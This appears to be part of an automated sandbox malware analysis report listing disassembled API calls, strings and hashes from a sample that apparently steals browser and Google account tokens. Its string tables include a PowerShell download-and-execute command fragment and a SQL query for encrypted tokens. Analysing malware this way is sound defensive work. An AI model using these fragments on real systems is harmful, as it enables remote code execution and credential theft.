                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C604E30
                                                                                                                                                                                          • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C604E4D
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C604E38
                                                                                                                                                                                          • %s at line %d of [%.10s], xrefs: 6C604E47
                                                                                                                                                                                          • invalid, xrefs: 6C604E25
                                                                                                                                                                                          • API call with %s database connection pointer, xrefs: 6C604E2A
                                                                                                                                                                                          • misuse, xrefs: 6C604E42
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_log
                                                                                                                                                                                          • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
                                                                                                                                                                                          • API String ID: 632333372-2974027950
                                                                                                                                                                                          • Opcode ID: 3503b717cdb5928740349c278bb7c987bc1b13afb08a5da73eac65634ea7ee91
                                                                                                                                                                                          • Instruction ID: c1b2ce8b248f9c76310f2150c03584b9223c617645626e10deecb0bddcec8ecf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3503b717cdb5928740349c278bb7c987bc1b13afb08a5da73eac65634ea7ee91
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AF02E21F445282FD63452169D10FE737855B21319F0945E1EB0477FE2D745A86242DE
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00029BB2
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,AccountId), ref: 00029BCF
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00029C7E
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00029C99
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpylstrlen$lstrcat$AllocLocal
                                                                                                                                                                                          • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                          • API String ID: 3306365304-1713091031
                                                                                                                                                                                          • Opcode ID: e1c46070804e1663d35b05567cb129702ea320989e0953b459c4b9ef8094fcfa
                                                                                                                                                                                          • Instruction ID: 7c80b1a86e59e071ed8d147a7f2d9d5a34d37dce6a9af07c78d1e923363f74e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: e1c46070804e1663d35b05567cb129702ea320989e0953b459c4b9ef8094fcfa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5881FA32900129EBCF02FBA4FD479DE77B9AF14305F510160F904B7167DB21AE999BA1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?,?,00000000,?,?), ref: 6C570CB3
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?), ref: 6C570DC1
                                                                                                                                                                                          • PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?), ref: 6C570DEC
                                                                                                                                                                                            • Part of subcall function 6C590F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C532AF5,?,?,?,?,?,6C530A1B,00000000), ref: 6C590F1A
                                                                                                                                                                                            • Part of subcall function 6C590F10: malloc.MOZGLUE(00000001), ref: 6C590F30
                                                                                                                                                                                            • Part of subcall function 6C590F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C590F42
                                                                                                                                                                                          • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?), ref: 6C570DFF
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C571444,?,00000001,?,00000000), ref: 6C570E16
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?), ref: 6C570E53
                                                                                                                                                                                          • PR_GetCurrentThread.NSS3(?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?,?,6C571444,?,?,00000000), ref: 6C570E65
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C571444,?,00000001,?,00000000,00000000,?), ref: 6C570E79
                                                                                                                                                                                            • Part of subcall function 6C581560: TlsGetValue.KERNEL32(00000000,?,6C550844,?), ref: 6C58157A
                                                                                                                                                                                            • Part of subcall function 6C581560: EnterCriticalSection.KERNEL32(?,?,?,6C550844,?), ref: 6C58158F
                                                                                                                                                                                            • Part of subcall function 6C581560: PR_Unlock.NSS3(?,?,?,?,6C550844,?), ref: 6C5815B2
                                                                                                                                                                                            • Part of subcall function 6C54B1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C551397,00000000,?,6C54CF93,5B5F5EC0,00000000,?,6C551397,?), ref: 6C54B1CB
                                                                                                                                                                                            • Part of subcall function 6C54B1A0: free.MOZGLUE(5B5F5EC0,?,6C54CF93,5B5F5EC0,00000000,?,6C551397,?), ref: 6C54B1D2
                                                                                                                                                                                            • Part of subcall function 6C5489E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C5488AE,-00000008), ref: 6C548A04
                                                                                                                                                                                            • Part of subcall function 6C5489E0: EnterCriticalSection.KERNEL32(?), ref: 6C548A15
                                                                                                                                                                                            • Part of subcall function 6C5489E0: memset.VCRUNTIME140(6C5488AE,00000000,00000132), ref: 6C548A27
                                                                                                                                                                                            • Part of subcall function 6C5489E0: PR_Unlock.NSS3(?), ref: 6C548A35
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1601681851-0
                                                                                                                                                                                          • Opcode ID: 1e42ff70ce70473ce6e8aff2c088b6c3ef333e7a4638230a0434049cd479f880
                                                                                                                                                                                          • Instruction ID: 9e5470c4489737ebb52d3f64a48a1449f85c3dc363a0b298481c9b95ccc62a91
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e42ff70ce70473ce6e8aff2c088b6c3ef333e7a4638230a0434049cd479f880
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5651B7F6D002009FEB109F64DC81AAB37E89F8521CF550465EC159B712FB32ED5987B2
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C526ED8
                                                                                                                                                                                          • sqlite3_value_text.NSS3(?,?), ref: 6C526EE5
                                                                                                                                                                                          • memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C526FA8
                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?), ref: 6C526FDB
                                                                                                                                                                                          • sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C526FF0
                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C527010
                                                                                                                                                                                          • sqlite3_value_blob.NSS3(?,?), ref: 6C52701D
                                                                                                                                                                                          • sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C527052
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1920323672-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00032EC0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • C:\ProgramData\, xrefs: 00032DA3
                                                                                                                                                                                          • .ps1, xrefs: 00032DF3
                                                                                                                                                                                          • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00032E18
                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00032E5B
                                                                                                                                                                                          • ')", xrefs: 00032E13
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                          • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                          • API String ID: 2215929589-1989157005
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C57AB3E,?,?,?), ref: 6C57AC35
                                                                                                                                                                                            • Part of subcall function 6C55CEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C55CF16
                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C57AB3E,?,?,?), ref: 6C57AC55
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C5910F3
                                                                                                                                                                                            • Part of subcall function 6C5910C0: EnterCriticalSection.KERNEL32(?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59110C
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PL_ArenaAllocate.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591141
                                                                                                                                                                                            • Part of subcall function 6C5910C0: PR_Unlock.NSS3(?,?,?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C591182
                                                                                                                                                                                            • Part of subcall function 6C5910C0: TlsGetValue.KERNEL32(?,6C538802,00000000,00000008,?,6C52EF74,00000000), ref: 6C59119C
                                                                                                                                                                                          • PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6C57AB3E,?,?), ref: 6C57AC70
                                                                                                                                                                                            • Part of subcall function 6C55E300: TlsGetValue.KERNEL32 ref: 6C55E33C
                                                                                                                                                                                            • Part of subcall function 6C55E300: EnterCriticalSection.KERNEL32(?), ref: 6C55E350
                                                                                                                                                                                            • Part of subcall function 6C55E300: PR_Unlock.NSS3(?), ref: 6C55E5BC
                                                                                                                                                                                            • Part of subcall function 6C55E300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6C55E5CA
                                                                                                                                                                                            • Part of subcall function 6C55E300: TlsGetValue.KERNEL32 ref: 6C55E5F2
                                                                                                                                                                                            • Part of subcall function 6C55E300: EnterCriticalSection.KERNEL32(?), ref: 6C55E606
                                                                                                                                                                                            • Part of subcall function 6C55E300: PORT_Alloc_Util.NSS3(?), ref: 6C55E613
                                                                                                                                                                                          • PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6C57AC92
                                                                                                                                                                                          • PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6C57AB3E), ref: 6C57ACD7
                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(?), ref: 6C57AD10
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6C57AD2B
                                                                                                                                                                                            • Part of subcall function 6C55F360: TlsGetValue.KERNEL32(00000000,?,6C57A904,?), ref: 6C55F38B
                                                                                                                                                                                            • Part of subcall function 6C55F360: EnterCriticalSection.KERNEL32(?,?,?,6C57A904,?), ref: 6C55F3A0
                                                                                                                                                                                            • Part of subcall function 6C55F360: PR_Unlock.NSS3(?,?,?,?,6C57A904,?), ref: 6C55F3D3
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2926855110-0
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C558C7C
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DC6
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C640A27), ref: 6C5F9DD1
                                                                                                                                                                                            • Part of subcall function 6C5F9DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C5F9DED
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C558CB0
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C558CD1
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C558CE5
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C558D2E
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6C558D62
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C558D93
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3131193014-0
                                                                                                                                                                                          • Opcode ID: 5ca07f1d449cd3133d8de68d3e79fea26ab38a849af0bffb4e1f8f09286db147
                                                                                                                                                                                          • Instruction ID: 05083b7f2230ed4fd98004682a8fcd49bf05442526bd88c2149956f7d12d2eeb
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ca07f1d449cd3133d8de68d3e79fea26ab38a849af0bffb4e1f8f09286db147
                                                                                                                                                                                          • Instruction Fuzzy Hash: C1315771A41601ABE700AF68CC4079AB7B0BF55318F540137EA26A7B50D770B934CBD2
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6C54E728,?,00000038,?,?,00000000), ref: 6C552E52
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C552E66
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C552E7B
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00000000), ref: 6C552E8F
                                                                                                                                                                                          • PL_HashTableLookup.NSS3(?,?), ref: 6C552E9E
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C552EAB
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C552F0D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalEnterSectionUnlockValue$HashLookupTable
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3106257965-0
                                                                                                                                                                                          • Opcode ID: 573d9450494af9ca2e3e4474621260115e6a261bad76b0f4adda11f73a661942
                                                                                                                                                                                          • Instruction ID: 7ec03555927967e3ce01e5f735aeab1a50de49b99a614ca9b02e791584f023a0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 573d9450494af9ca2e3e4474621260115e6a261bad76b0f4adda11f73a661942
                                                                                                                                                                                          • Instruction Fuzzy Hash: BD31F676A00505EBEB00AF29EC85876B778EF45258F448665EC0987A11EB31EC64C7E1
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4584F3
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45850A
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45851E
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45855B
                                                                                                                                                                                          • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45856F
                                                                                                                                                                                          • ??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4585AC
                                                                                                                                                                                            • Part of subcall function 6C457670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C4585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C45767F
                                                                                                                                                                                            • Part of subcall function 6C457670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C4585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C457693
                                                                                                                                                                                            • Part of subcall function 6C457670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C4585B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4576A7
                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C4585B2
                                                                                                                                                                                            • Part of subcall function 6C435E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C435EDB
                                                                                                                                                                                            • Part of subcall function 6C435E90: memset.VCRUNTIME140(ewGl,000000E5,?), ref: 6C435F27
                                                                                                                                                                                            • Part of subcall function 6C435E90: LeaveCriticalSection.KERNEL32(?), ref: 6C435FB2
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704137116.000000006C411000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C410000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c410000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2666944752-0
                                                                                                                                                                                          • Opcode ID: 217b671b40b3abf48b1ab205e56be121acd2eba55324379224511a62582f7879
                                                                                                                                                                                          • Instruction ID: 271ca622e4edff77d43f107980c023395a34aae35a2b90a3654a98ec4077fa0d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 217b671b40b3abf48b1ab205e56be121acd2eba55324379224511a62582f7879
                                                                                                                                                                                          • Instruction Fuzzy Hash: B9219C742006018FEB14EF69D888E5AB7B5AF8431EF64482DE55BC3B41DB31F968CB91
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C548C1B
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32 ref: 6C548C34
                                                                                                                                                                                          • PL_ArenaAllocate.NSS3 ref: 6C548C65
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C548C9C
                                                                                                                                                                                          • PR_Unlock.NSS3 ref: 6C548CB6
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: TlsGetValue.KERNEL32 ref: 6C5DDD8C
                                                                                                                                                                                            • Part of subcall function 6C5DDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5DDDB4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                                          • String ID: KRAM
                                                                                                                                                                                          • API String ID: 4127063985-3815160215
                                                                                                                                                                                          • Opcode ID: e65902870dad57e3d879afa6522cd5a9137cc557cd65320a8a34ef9f0afd407e
                                                                                                                                                                                          • Instruction ID: e8d5add14ff35a7bb4ad7083dadc43baadfd649f108b0c417e7002cc234475db
                                                                                                                                                                                          • Opcode Fuzzy Hash: e65902870dad57e3d879afa6522cd5a9137cc557cd65320a8a34ef9f0afd407e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 37216BB1A05A01DFD700AF39C884659BBF4BF55304F05C96AD889CB701EB35E889CBD2
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C642CA0
                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C642CBE
                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000014), ref: 6C642CD1
                                                                                                                                                                                          • strdup.MOZGLUE(?), ref: 6C642CE1
                                                                                                                                                                                          • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6C642D27
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Loaded library %s (static lib), xrefs: 6C642D22
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                                          • String ID: Loaded library %s (static lib)
                                                                                                                                                                                          • API String ID: 3511436785-2186981405
                                                                                                                                                                                          • Opcode ID: 4d0a2e0dec19a07c47b72bca7143c8137fbc71f7a51102664ed700289ab947a3
                                                                                                                                                                                          • Instruction ID: 9a76c7c7563c3097e9f32249a55d3a98010e1e2fc4836543b9adce3dcc3be82c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d0a2e0dec19a07c47b72bca7143c8137fbc71f7a51102664ed700289ab947a3
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5411B2B1A01241DFEB148F16DC88AA677B9AB8635DF24C12DD819C7B41E731D808CFA9
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Name::operator+$NameName::
                                                                                                                                                                                          • String ID: throw(
                                                                                                                                                                                          • API String ID: 168861036-3159766648
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5D3046
                                                                                                                                                                                            • Part of subcall function 6C5BEE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5BEE85
                                                                                                                                                                                          • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6C5A7FFB), ref: 6C5D312A
                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5D3154
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5D2E8B
                                                                                                                                                                                            • Part of subcall function 6C5DC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5DC2BF
                                                                                                                                                                                            • Part of subcall function 6C5BF110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6C5A9BFF,?,00000000,00000000), ref: 6C5BF134
                                                                                                                                                                                          • memcpy.VCRUNTIME140(8B3C75C0,?,6C5A7FFA), ref: 6C5D2EA4
                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5D317B
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
